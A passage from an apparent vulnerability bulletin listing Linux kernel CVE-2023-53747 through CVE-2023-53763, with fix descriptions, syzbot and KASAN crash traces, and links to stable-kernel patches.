(drivers/tty/tty_io.c:1303 drivers/tty/tty_io.c:1415 drivers/tty/tty_io.c:1392) tty_open (drivers/tty/tty_io.c:2082 drivers/tty/tty_io.c:2128) chrdev_open (fs/char_dev.c:415) do_dentry_open (fs/open.c:921) vfs_open (fs/open.c:1052) ... Freed by task 4116: kfree (mm/slab_common.c:1016) vc_port_destruct (drivers/tty/vt/vt.c:1044) tty_port_destructor (drivers/tty/tty_port.c:296) tty_port_put (drivers/tty/tty_port.c:312) vt_disallocate_all (drivers/tty/vt/vt_ioctl.c:662 (discriminator 2)) vt_ioctl (drivers/tty/vt/vt_ioctl.c:903) tty_ioctl (drivers/tty/tty_io.c:2778) ... The buggy address belongs to the object at ffff8880beab8800 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 424 bytes inside of freed 1024-byte region [ffff8880beab8800, ffff8880beab8c00) The buggy address belongs to the physical page: page:00000000afc77580 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0xbeab8 head:00000000afc77580 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff) page_type: 0xffffffff() raw: 000fffffc0010200 ffff888100042dc0 ffffea000426de00 dead000000000002 raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff8880beab8880: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880beab8900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff8880beab8980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff8880beab8a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880beab8a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== Disabling lock debugging due to kernel taint | 2025-12-08 | not yet calculated | CVE-2023-53747 | https://git.kernel.org/stable/c/934de9a9b659785fed3e820bc0c813a460c71fea https://git.kernel.org/stable/c/0deff678157333d775af190f84696336cdcccd6d https://git.kernel.org/stable/c/a4e3c4c65ae8510e01352c9a4347e05c035b2ce2 https://git.kernel.org/stable/c/11dddfbb7a4e62489b01074d6c04d9d1b42e4047 https://git.kernel.org/stable/c/e3d1adcad5b73c7ed0c7edb35ab68abcaa45cf67 https://git.kernel.org/stable/c/3338d0b9acde770ee588eead5cac32c25e7048fc https://git.kernel.org/stable/c/1de42e7653d6714a7507ba6696151a1fa028c69f https://git.kernel.org/stable/c/8fb9ea65c9d1338b0d2bb0a9122dc942cdd32357 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Fix potential array out-of-bounds in decoder queue_setup variable *nplanes is provided by user via system call argument. The possible value of q_data->fmt->num_planes is 1-3, while the value of *nplanes can be 1-8. The array access by index i can cause array out-of-bounds. Fix this bug by checking *nplanes against the array size. | 2025-12-08 | not yet calculated | CVE-2023-53748 | https://git.kernel.org/stable/c/48e4e06e2c5fe1fda283d499f91492eda2248bb9 https://git.kernel.org/stable/c/b8e19bf3b4aebd855be01b64674187dcf6d1db51 https://git.kernel.org/stable/c/8fbcf730cb89c3647f3365226fe7014118fa93c7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86: fix clear_user_rep_good() exception handling annotation This code no longer exists in mainline, because it was removed in commit d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") upstream. However, rather than backport the full range of x86 memory clearing and copying cleanups, fix the exception table annotation placement for the final 'rep movsb' in clear_user_rep_good(): rather than pointing at the actual instruction that did the user space access, it pointed to the register move just before it. That made sense from a code flow standpoint, but not from an actual usage standpoint: it means that if user access takes an exception, the exception handler won't actually find the instruction in the exception tables. As a result, rather than fixing it up and returning -EFAULT, it would then turn it into a kernel oops report instead, something like: BUG: unable to handle page fault for address: 0000000020081000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page ... RIP: 0010:clear_user_rep_good+0x1c/0x30 arch/x86/lib/clear_page_64.S:147 ... Call Trace: __clear_user arch/x86/include/asm/uaccess_64.h:103 [inline] clear_user arch/x86/include/asm/uaccess_64.h:124 [inline] iov_iter_zero+0x709/0x1290 lib/iov_iter.c:800 iomap_dio_hole_iter fs/iomap/direct-io.c:389 [inline] iomap_dio_iter fs/iomap/direct-io.c:440 [inline] __iomap_dio_rw+0xe3d/0x1cd0 fs/iomap/direct-io.c:601 iomap_dio_rw+0x40/0xa0 fs/iomap/direct-io.c:689 ext4_dio_read_iter fs/ext4/file.c:94 [inline] ext4_file_read_iter+0x4be/0x690 fs/ext4/file.c:145 call_read_iter include/linux/fs.h:2183 [inline] do_iter_readv_writev+0x2e0/0x3b0 fs/read_write.c:733 do_iter_read+0x2f2/0x750 fs/read_write.c:796 vfs_readv+0xe5/0x150 fs/read_write.c:916 do_preadv+0x1b6/0x270 fs/read_write.c:1008 __do_sys_preadv2 fs/read_write.c:1070 [inline] __se_sys_preadv2 fs/read_write.c:1061 [inline] __x64_sys_preadv2+0xef/0x150 fs/read_write.c:1061 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd which then looks like a filesystem bug rather than the incorrect exception annotation that it is. [ The alternative to this one-liner fix is to take the upstream series that cleans this all up: 68674f94ffc9 ("x86: don't use REP_GOOD or ERMS for small memory copies") 20f3337d350c ("x86: don't use REP_GOOD or ERMS for small memory clearing") adfcf4231b8c ("x86: don't use REP_GOOD or ERMS for user memory copies") * d2c95f9d6802 ("x86: don't use REP_GOOD or ERMS for user memory clearing") 3639a535587d ("x86: move stac/clac from user copy routines into callers") 577e6a7fd50d ("x86: inline the 'rep movs' in user copies for the FSRM case") 8c9b6a88b7e2 ("x86: improve on the non-rep 'clear_user' function") 427fda2c8a49 ("x86: improve on the non-rep 'copy_user' function") * e046fe5a36a9 ("x86: set FSRS automatically on AMD CPUs that have FSRM") e1f2750edc4a ("x86: remove 'zerorest' argument from __copy_user_nocache()") 034ff37d3407 ("x86: rewrite '__copy_user_nocache' function") with either the whole series or at a minimum the two marked commits being needed to fix this issue ] | 2025-12-08 | not yet calculated | CVE-2023-53749 | https://git.kernel.org/stable/c/90510aed20a26e1a4dede4ef6b640e6a4122f38f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: freescale: Fix a memory out of bounds when num_configs is 1 The config passed in by pad wakeup is 1, when num_configs is 1, Configuration [1] should not be fetched, which will be detected by KASAN as a memory out of bounds condition. Modify to get configs[1] when num_configs is 2. | 2025-12-08 | not yet calculated | CVE-2023-53750 | https://git.kernel.org/stable/c/f85d3cb10f4df5ae3bdb9a9357315c28d781651f https://git.kernel.org/stable/c/27d9a7585b594bb2f9bb1f65e0003814fcc69c75 https://git.kernel.org/stable/c/9063777ca1e2e895c5fdd493ee0c3f18fa710ed4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential use-after-free bugs in TCP_Server_Info::hostname TCP_Server_Info::hostname may be updated once or many times during reconnect, so protect its access outside reconnect path as well and then prevent any potential use-after-free bugs. | 2025-12-08 | not yet calculated | CVE-2023-53751 | https://git.kernel.org/stable/c/64d62ac6d6514cba1305bd08e271ec1843bdd612 https://git.kernel.org/stable/c/c511954bf142fe1995aec3c739a9f1a76990283a https://git.kernel.org/stable/c/0b08c4c499200be67d54c439d56e5ea866869945 https://git.kernel.org/stable/c/90c49fce1c43e1cc152695e20363ff5087897c09 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: deal with integer overflows in kmalloc_reserve() Blamed commit changed: ptr = kmalloc(size); if (ptr) size = ksize(ptr); size = kmalloc_size_roundup(size); ptr = kmalloc(size); This allowed various crash as reported by syzbot [1] and Kyle Zeng. Problem is that if @size is bigger than 0x80000001, kmalloc_size_roundup(size) returns 2^32. kmalloc_reserve() uses a 32bit variable (obj_size), so 2^32 is truncated to 0. kmalloc(0) returns ZERO_SIZE_PTR which is not handled by skb allocations. Following trace can be triggered if a netdev->mtu is set close to 0x7fffffff We might in the future limit netdev->mtu to more sensible limit (like KMALLOC_MAX_SIZE). This patch is based on a syzbot report, and also a report and tentative fix from Kyle Zeng. [1] BUG: KASAN: user-memory-access in __build_skb_around net/core/skbuff.c:294 [inline] BUG: KASAN: user-memory-access in __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527 Write of size 32 at addr 00000000fffffd10 by task syz-executor.4/22554 CPU: 1 PID: 22554 Comm: syz-executor.4 Not tainted 6.1.39-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/03/2023 Call trace: dump_backtrace+0x1c8/0x1f4 arch/arm64/kernel/stacktrace.c:279 show_stack+0x2c/0x3c arch/arm64/kernel/stacktrace.c:286 __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x120/0x1a0 lib/dump_stack.c:106 print_report+0xe4/0x4b4 mm/kasan/report.c:398 kasan_report+0x150/0x1ac mm/kasan/report.c:495 kasan_check_range+0x264/0x2a4 mm/kasan/generic.c:189 memset+0x40/0x70 mm/kasan/shadow.c:44 __build_skb_around net/core/skbuff.c:294 [inline] __alloc_skb+0x3c4/0x6e8 net/core/skbuff.c:527 alloc_skb include/linux/skbuff.h:1316 [inline] igmpv3_newpack+0x104/0x1088 net/ipv4/igmp.c:359 add_grec+0x81c/0x1124 net/ipv4/igmp.c:534 igmpv3_send_cr net/ipv4/igmp.c:667 [inline] igmp_ifc_timer_expire+0x1b0/0x1008 net/ipv4/igmp.c:810 call_timer_fn+0x1c0/0x9f0 kernel/time/timer.c:1474 expire_timers kernel/time/timer.c:1519 [inline] __run_timers+0x54c/0x710 kernel/time/timer.c:1790 run_timer_softirq+0x28/0x4c kernel/time/timer.c:1803 _stext+0x380/0xfbc ____do_softirq+0x14/0x20 arch/arm64/kernel/irq.c:79 call_on_irq_stack+0x24/0x4c arch/arm64/kernel/entry.S:891 do_softirq_own_stack+0x20/0x2c arch/arm64/kernel/irq.c:84 invoke_softirq kernel/softirq.c:437 [inline] __irq_exit_rcu+0x1c0/0x4cc kernel/softirq.c:683 irq_exit_rcu+0x14/0x78 kernel/softirq.c:695 el0_interrupt+0x7c/0x2e0 arch/arm64/kernel/entry-common.c:717 __el0_irq_handler_common+0x18/0x24 arch/arm64/kernel/entry-common.c:724 el0t_64_irq_handler+0x10/0x1c arch/arm64/kernel/entry-common.c:729 el0t_64_irq+0x1a0/0x1a4 arch/arm64/kernel/entry.S:584 | 2025-12-08 | not yet calculated | CVE-2023-53752 | https://git.kernel.org/stable/c/31cf7853a940181593e4472fc56f46574123f9f6 https://git.kernel.org/stable/c/e4ffc47a1c3e5d11a853aa178c9a5136e79412e9 https://git.kernel.org/stable/c/bf7da02d2b8faf324206e1cbe64a4813ff903cc1 https://git.kernel.org/stable/c/915d975b2ffa58a14bfcf16fafe00c41315949ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix mapping to non-allocated address [Why] There is an issue mapping non-allocated location of memory. It would allocate gpio registers from an array out of bounds. [How] Patch correct numbers of bounds for using. | 2025-12-08 | not yet calculated | CVE-2023-53753 | https://git.kernel.org/stable/c/8ce8a443ddd9002861a4ee8a7e33a0c02717422f https://git.kernel.org/stable/c/24aaf6603600d6d1159973c809ea2737664b28c4 https://git.kernel.org/stable/c/9190d4a263264eabf715f5fc1827da45e3fdc247 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix ioremap issues in lpfc_sli4_pci_mem_setup() When if_type equals zero and pci_resource_start(pdev, PCI_64BIT_BAR4) returns false, drbl_regs_memmap_p is not remapped. This passes a NULL pointer to iounmap(), which can trigger a WARN() on certain arches. When if_type equals six and pci_resource_start(pdev, PCI_64BIT_BAR4) returns true, drbl_regs_memmap_p may have been remapped and ctrl_regs_memmap_p is not remapped. This is a resource leak and passes a NULL pointer to iounmap(). To fix these issues, we need to add null checks before iounmap(), and change some goto labels. | 2025-12-08 | not yet calculated | CVE-2023-53754 | https://git.kernel.org/stable/c/74d90f92eafe8ccd12827228236a28a94eda6bcc https://git.kernel.org/stable/c/bab8dc38b1a0a12bc064fc064269033bdcf5b88e https://git.kernel.org/stable/c/fd8c83d8375b9dac1949f2753485a5c055ebfad0 https://git.kernel.org/stable/c/e6f1ef4a53856ed000b0f7265d7e16dcb00f4243 https://git.kernel.org/stable/c/631d0fab143bef85ea0813596f1dda36e2b9724c https://git.kernel.org/stable/c/7e5a54d1f00725a739dcd20f616d82eff4f764bd https://git.kernel.org/stable/c/91a0c0c1413239d0548b5aac4c82f38f6d53a91e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: ptdma: check for null desc before calling pt_cmd_callback Resolves a panic that can occur on AMD systems, typically during host shutdown, after the PTDMA driver had been exercised. The issue was the pt_issue_pending() function is mistakenly assuming that there will be at least one descriptor in the Submitted queue when the function is called. However, it is possible that both the Submitted and Issued queues could be empty, which could result in pt_cmd_callback() being mistakenly called with a NULL pointer. Ref: Bugzilla Bug 216856. | 2025-12-08 | not yet calculated | CVE-2023-53755 | https://git.kernel.org/stable/c/8ae2113702613207efc05453bc9a3df2b992bf45 https://git.kernel.org/stable/c/5bba023b1241c7af5d40447503a68de282ad5190 https://git.kernel.org/stable/c/928469986171a6f763b34b039427f5667ba3fd50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: VMX: Fix crash due to uninitialized current_vmcs KVM enables 'Enlightened VMCS' and 'Enlightened MSR Bitmap' when running as a nested hypervisor on top of Hyper-V. When MSR bitmap is updated, evmcs_touch_msr_bitmap function uses current_vmcs per-cpu variable to mark that the msr bitmap was changed. vmx_vcpu_create() modifies the msr bitmap via vmx_disable_intercept_for_msr -> vmx_msr_bitmap_l01_changed which in the end calls this function. The function checks for current_vmcs if it is null but the check is insufficient because current_vmcs is not initialized. Because of this, the code might incorrectly write to the structure pointed by current_vmcs value left by another task. Preemption is not disabled, the current task can be preempted and moved to another CPU while current_vmcs is accessed multiple times from evmcs_touch_msr_bitmap() which leads to a crash. The manipulation of MSR bitmaps by callers happens only for vmcs01 so the solution is to use vmx->vmcs01.vmcs instead of current_vmcs. BUG: kernel NULL pointer dereference, address: 0000000000000338 PGD 4e1775067 P4D 0 Oops: 0002 [#1] PREEMPT SMP NOPTI ... RIP: 0010:vmx_msr_bitmap_l01_changed+0x39/0x50 [kvm_intel] ... Call Trace: vmx_disable_intercept_for_msr+0x36/0x260 [kvm_intel] vmx_vcpu_create+0xe6/0x540 [kvm_intel] kvm_arch_vcpu_create+0x1d1/0x2e0 [kvm] kvm_vm_ioctl_create_vcpu+0x178/0x430 [kvm] kvm_vm_ioctl+0x53f/0x790 [kvm] __x64_sys_ioctl+0x8a/0xc0 do_syscall_64+0x5c/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-08 | not yet calculated | CVE-2023-53756 | https://git.kernel.org/stable/c/6baebcecf09acd19e2bab1c2911dcdba5d48a1dc https://git.kernel.org/stable/c/6e7bc50f97c9855da83f1478f722590defd45ff2 https://git.kernel.org/stable/c/b2de2b4d4e007f9add46ea8dc06f781835e3ea9f https://git.kernel.org/stable/c/3ba95cc671c025d0d2a1c7d5e2930f0ff0980cf4 https://git.kernel.org/stable/c/93827a0a36396f2fd6368a54a020f420c8916e9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: irqchip/irq-mvebu-gicp: Fix refcount leak in mvebu_gicp_probe of_irq_find_parent() returns a node pointer with refcount incremented. We should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-08 | not yet calculated | CVE-2023-53757 | https://git.kernel.org/stable/c/d6b99b9b5e354f9c801a3cc3b1d4881d920e1718 https://git.kernel.org/stable/c/4545d7a70ce0fc78b1d3c33c4a0939a86f363b57 https://git.kernel.org/stable/c/c7d78d36e19eeb74a1c12799fbadbcdbaf36c0bd https://git.kernel.org/stable/c/cee12e8be8e227731a845ae43a4c9ce2e404be45 https://git.kernel.org/stable/c/88cb93d3a16f706bd7213f8a5882c394e5d10c4e https://git.kernel.org/stable/c/bb755e020abc24793b9411c9419ed43f07f9a03d https://git.kernel.org/stable/c/91e149b201bdb68c77011d50d011e47fadbcc8bd https://git.kernel.org/stable/c/9419e700021a393f67be36abd0c4f3acc6139041 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: atmel-quadspi: Free resources even if runtime resume failed in .remove() An early error exit in atmel_qspi_remove() doesn't prevent the device unbind. So this results in an spi controller with an unbound parent and unmapped register space (because devm_ioremap_resource() is undone). So using the remaining spi controller probably results in an oops. Instead unregister the controller unconditionally and only skip hardware access and clk disable. Also add a warning about resume failing and return zero unconditionally. The latter has the only effect to suppress a less helpful error message by the spi core. | 2025-12-08 | not yet calculated | CVE-2023-53758 | https://git.kernel.org/stable/c/f6974fb20499e3b6522daa7aec822aac11dfcf42 https://git.kernel.org/stable/c/618770d4d8e40b7f8ed9eb5f210cd9164dfac47d https://git.kernel.org/stable/c/77806d7c9bebe40a8cdce2b8d30fbe6511745df8 https://git.kernel.org/stable/c/9448bc1dee65f86c0fe64d9dea8b410af0586886 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: hidraw: fix data race on device refcount The hidraw_open() function increments the hidraw device reference counter. The counter has no dedicated synchronization mechanism, resulting in a potential data race when concurrently opening a device. The race is a regression introduced by commit 8590222e4b02 ("HID: hidraw: Replace hidraw device table mutex with a rwsem"). While minors_rwsem is intended to protect the hidraw_table itself, by instead acquiring the lock for writing, the reference counter is also protected. This is symmetrical to hidraw_release(). | 2025-12-08 | not yet calculated | CVE-2023-53759 | https://git.kernel.org/stable/c/879e79c3aead41b8aa2e91164354b30bd1c4ef3b https://git.kernel.org/stable/c/ff348eabd97577da974d3db7038857f28c61d2bd https://git.kernel.org/stable/c/05b47034e2488c2924e5c032e20a1979d012b5b5 https://git.kernel.org/stable/c/944ee77dc6ec7b0afd8ec70ffc418b238c92f12b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: mcq: Fix &hwq->cq_lock deadlock issue When ufshcd_err_handler() is executed, CQ event interrupt can enter waiting for the same lock. This can happen in ufshcd_handle_mcq_cq_events() and also in ufs_mtk_mcq_intr(). The following warning message will be generated when &hwq->cq_lock is used in IRQ context with IRQ enabled. Use ufshcd_mcq_poll_cqe_lock() with spin_lock_irqsave instead of spin_lock to resolve the deadlock issue. [name:lockdep&]WARNING: inconsistent lock state [name:lockdep&]-------------------------------- [name:lockdep&]inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. [name:lockdep&]kworker/u16:4/260 [HC0[0]:SC0[0]:HE1:SE1] takes: ffffff8028444600 (&hwq->cq_lock){?.-.}-{2:2}, at: ufshcd_mcq_poll_cqe_lock+0x30/0xe0 [name:lockdep&]{IN-HARDIRQ-W} state was registered at: lock_acquire+0x17c/0x33c _raw_spin_lock+0x5c/0x7c ufshcd_mcq_poll_cqe_lock+0x30/0xe0 ufs_mtk_mcq_intr+0x60/0x1bc [ufs_mediatek_mod] __handle_irq_event_percpu+0x140/0x3ec handle_irq_event+0x50/0xd8 handle_fasteoi_irq+0x148/0x2b0 generic_handle_domain_irq+0x4c/0x6c gic_handle_irq+0x58/0x134 call_on_irq_stack+0x40/0x74 do_interrupt_handler+0x84/0xe4 el1_interrupt+0x3c/0x78 <snip> Possible unsafe locking scenario: CPU0 ---- lock(&hwq->cq_lock); <Interrupt> lock(&hwq->cq_lock); *** DEADLOCK *** 2 locks held by kworker/u16:4/260: [name:lockdep&] stack backtrace: CPU: 7 PID: 260 Comm: kworker/u16:4 Tainted: G S W OE 6.1.17-mainline-android14-2-g277223301adb #1 Workqueue: ufs_eh_wq_0 ufshcd_err_handler Call trace: dump_backtrace+0x10c/0x160 show_stack+0x20/0x30 dump_stack_lvl+0x98/0xd8 dump_stack+0x20/0x60 print_usage_bug+0x584/0x76c mark_lock_irq+0x488/0x510 mark_lock+0x1ec/0x25c __lock_acquire+0x4d8/0xffc lock_acquire+0x17c/0x33c _raw_spin_lock+0x5c/0x7c ufshcd_mcq_poll_cqe_lock+0x30/0xe0 ufshcd_poll+0x68/0x1b0 ufshcd_transfer_req_compl+0x9c/0xc8 ufshcd_err_handler+0x3bc/0xea0 process_one_work+0x2f4/0x7e8 worker_thread+0x234/0x450 kthread+0x110/0x134 ret_from_fork+0x10/0x20 | 2025-12-08 | not yet calculated | CVE-2023-53760 | https://git.kernel.org/stable/c/2ce8c49c7b53e0a2258b833eeab16a6d78f732d1 https://git.kernel.org/stable/c/948afc69615167a3c82430f99bfd046332b89912 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: usbtmc: Fix direction for 0-length ioctl control messages The syzbot fuzzer found a problem in the usbtmc driver: When a user submits an ioctl for a 0-length control transfer, the driver does not check that the direction is set to OUT: ------------[ cut here ]------------ usb 3-1: BOGUS control dir, pipe 80000b80 doesn't match bRequestType fd WARNING: CPU: 0 PID: 5100 at drivers/usb/core/urb.c:411 usb_submit_urb+0x14a7/0x1880 drivers/usb/core/urb.c:411 Modules linked in: CPU: 0 PID: 5100 Comm: syz-executor428 Not tainted 6.3.0-syzkaller-12049-g58390c8ce1bd #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023 RIP: 0010:usb_submit_urb+0x14a7/0x1880 drivers/usb/core/urb.c:411 Code: 7c 24 40 e8 1b 13 5c fb 48 8b 7c 24 40 e8 21 1d f0 fe 45 89 e8 44 89 f1 4c 89 e2 48 89 c6 48 c7 c7 e0 b5 fc 8a e8 19 c8 23 fb <0f> 0b e9 9f ee ff ff e8 ed 12 5c fb 0f b6 1d 12 8a 3c 08 31 ff 41 RSP: 0018:ffffc90003d2fb00 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffff8880789e9058 RCX: 0000000000000000 RDX: ffff888029593b80 RSI: ffffffff814c1447 RDI: 0000000000000001 RBP: ffff88801ea742f8 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffff88802915e528 R13: 00000000000000fd R14: 0000000080000b80 R15: ffff8880222b3100 FS: 0000555556ca63c0(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f9ef4d18150 CR3: 0000000073e5b000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> usb_start_wait_urb+0x101/0x4b0 drivers/usb/core/message.c:58 usb_internal_control_msg drivers/usb/core/message.c:102 [inline] usb_control_msg+0x320/0x4a0 drivers/usb/core/message.c:153 usbtmc_ioctl_request drivers/usb/class/usbtmc.c:1954 [inline] usbtmc_ioctl+0x1b3d/0x2840 drivers/usb/class/usbtmc.c:2097 To fix this, we must override the direction in the bRequestType field of the control request structure when the length is 0. | 2025-12-08 | not yet calculated | CVE-2023-53761 | https://git.kernel.org/stable/c/7cef7681aa7719ff585dd06113a061ab2def7da0 https://git.kernel.org/stable/c/6340e432cf70bf156b19c6f5dd737d940eca02a3 https://git.kernel.org/stable/c/3b43d9df27a708f4079d518b879f517fea150a91 https://git.kernel.org/stable/c/0ced12bdf624d8d8977ddb16eb130cd479d92bcf https://git.kernel.org/stable/c/50775a046c68e1d157d5e413cae2e5e00da1c463 https://git.kernel.org/stable/c/94d25e9128988c6a1fc9070f6e98215a95795bd8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Fix UAF in hci_disconnect_all_sync Use-after-free can occur in hci_disconnect_all_sync if a connection is deleted by concurrent processing of a controller event. To prevent this the code now tries to iterate over the list backwards to ensure the links are cleaned up before their parents, also it no longer relies on a cursor, instead it always uses the last element since hci_abort_conn_sync is guaranteed to call hci_conn_del. UAF crash log: ================================================================== BUG: KASAN: slab-use-after-free in hci_set_powered_sync (net/bluetooth/hci_sync.c:5424) [bluetooth] Read of size 8 at addr ffff888009d9c000 by task kworker/u9:0/124 CPU: 0 PID: 124 Comm: kworker/u9:0 Tainted: G W 6.5.0-rc1+ #10 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014 Workqueue: hci0 hci_cmd_sync_work [bluetooth] Call Trace: <TASK> dump_stack_lvl+0x5b/0x90 print_report+0xcf/0x670 ? __virt_addr_valid+0xdd/0x160 ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] kasan_report+0xa6/0xe0 ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] ? __pfx_set_powered_sync+0x10/0x10 [bluetooth] hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] ? __pfx_hci_set_powered_sync+0x10/0x10 [bluetooth] ? __pfx_lock_release+0x10/0x10 ? __pfx_set_powered_sync+0x10/0x10 [bluetooth] hci_cmd_sync_work+0x137/0x220 [bluetooth] process_one_work+0x526/0x9d0 ? __pfx_process_one_work+0x10/0x10 ? __pfx_do_raw_spin_lock+0x10/0x10 ? mark_held_locks+0x1a/0x90 worker_thread+0x92/0x630 ? __pfx_worker_thread+0x10/0x10 kthread+0x196/0x1e0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> Allocated by task 1782: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_kmalloc+0x8f/0xa0 hci_conn_add+0xa5/0xa80 [bluetooth] hci_bind_cis+0x881/0x9b0 [bluetooth] iso_connect_cis+0x121/0x520 [bluetooth] iso_sock_connect+0x3f6/0x790 [bluetooth] __sys_connect+0x109/0x130 __x64_sys_connect+0x40/0x50 do_syscall_64+0x60/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Freed by task 695: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 __kmem_cache_free+0x14d/0x2e0 device_release+0x5d/0xf0 kobject_put+0xdf/0x270 hci_disconn_complete_evt+0x274/0x3a0 [bluetooth] hci_event_packet+0x579/0x7e0 [bluetooth] hci_rx_work+0x287/0xaa0 [bluetooth] process_one_work+0x526/0x9d0 worker_thread+0x92/0x630 kthread+0x196/0x1e0 ret_from_fork+0x2c/0x50 ================================================================== | 2025-12-08 | not yet calculated | CVE-2023-53762 | https://git.kernel.org/stable/c/a30c074f0b5b7f909a15c978fbc96a29e2f94e42 https://git.kernel.org/stable/c/ba3ba53ce1f76fc372b8f918fece4f9b1e41acd4 https://git.kernel.org/stable/c/94d9ba9f9888b748d4abd2aa1547af56ae85f772 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "f2fs: fix to do sanity check on extent cache correctly" syzbot reports a f2fs bug as below: UBSAN: array-index-out-of-bounds in fs/f2fs/f2fs.h:3275:19 index 1409 is out of range for type '__le32[923]' (aka 'unsigned int[923]') Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106 ubsan_epilogue lib/ubsan.c:217 [inline] __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348 inline_data_addr fs/f2fs/f2fs.h:3275 [inline] __recover_inline_status fs/f2fs/inode.c:113 [inline] do_read_inode fs/f2fs/inode.c:480 [inline] f2fs_iget+0x4730/0x48b0 fs/f2fs/inode.c:604 f2fs_fill_super+0x640e/0x80c0 fs/f2fs/super.c:4601 mount_bdev+0x276/0x3b0 fs/super.c:1391 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 do_new_mount+0x28f/0xae0 fs/namespace.c:3335 do_mount fs/namespace.c:3675 [inline] __do_sys_mount fs/namespace.c:3884 [inline] __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The issue was bisected to: commit d48a7b3a72f121655d95b5157c32c7d555e44c05 Author: Chao Yu <chao@kernel.org> Date: Mon Jan 9 03:49:20 2023 +0000 f2fs: fix to do sanity check on extent cache correctly The root cause is we applied both v1 and v2 of the patch, v2 is the right fix, so it needs to revert v1 in order to fix reported issue. v1: commit d48a7b3a72f1 ("f2fs: fix to do sanity check on extent cache correctly") https://lore.kernel.org/lkml/20230109034920.492914-1-chao@kernel.org/ v2: commit 269d11948100 ("f2fs: fix to do sanity check on extent cache correctly") https://lore.kernel.org/lkml/20230207134808.1827869-1-chao@kernel.org/ | 2025-12-08 | not yet calculated | CVE-2023-53763 | https://git.kernel.org/stable/c/0d545a8e77cbd1fbad311b18952e38e0f7672ab4 https://git.kernel.org/stable/c/ea35767edc78327c686e21fe1231b668f11be0db https://git.kernel.org/stable/c/bbb3cd66301ef752fae2922452660f228d69bcaf https://git.kernel.org/stable/c/958ccbbf1ce716d77c7cfa79ace50a421c1eed73 |
